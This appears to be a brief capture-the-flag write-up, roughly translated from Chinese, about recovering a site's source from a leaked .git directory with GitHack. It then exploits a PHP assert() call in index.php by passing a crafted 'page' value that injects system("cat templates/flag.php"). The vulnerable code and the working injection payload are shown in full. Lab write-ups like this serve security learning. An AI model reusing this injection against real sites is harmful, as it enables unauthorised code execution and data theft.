msf
practice:
.Git leaked source code analysis
Ideas:
In browsing the web, I found About page has about Git in, try to access the .git file
.git source code leak:
Using git init initialization code repository, will generate a hidden file named .git, you can use this file to restore the source code. If the file is deleted will produce .git source code disclosure vulnerability when publishing code.
step:
Use Githack exploit obtain the source code
Githack need to run with python2 environment
.png)
.png)
After obtaining the source view files and found flag.php, but does not open can use clues.
.png)
Continue to browse files, suggesting a breakthrough may be in index.php
<?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".php"; // I heard '..' is dangerous! assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // TODO: Make this look nice assert("file_exists('$file')") or die("That file doesn't exist!"); ?>Function Description:
- assert (str): str resolves to code to execute, returns true or false
- strpos (str, obj_str): returns the position of the first occurrence obj_str in str
After the audit found that the host of the code page value of the upload did not do any filtering, you can take advantage of the presence of a local file that contains the vulnerability.
Malicious page can be configured to pass values, used payload:
page=suibian') or system("cat templates/flag.php");//After splicing:
$file = "templates/" . "suibian') or system("cat templates/flag.php");". ".php";Next:
assert("strpos('templates/suibian') or system("cat templates/flag.php"); //.php', '..') === false") or die("Detected hacking attempt!"); 本行已被注释Since strpos returns false, the statement is executed or after.
Find the flag in a comment
.jpg)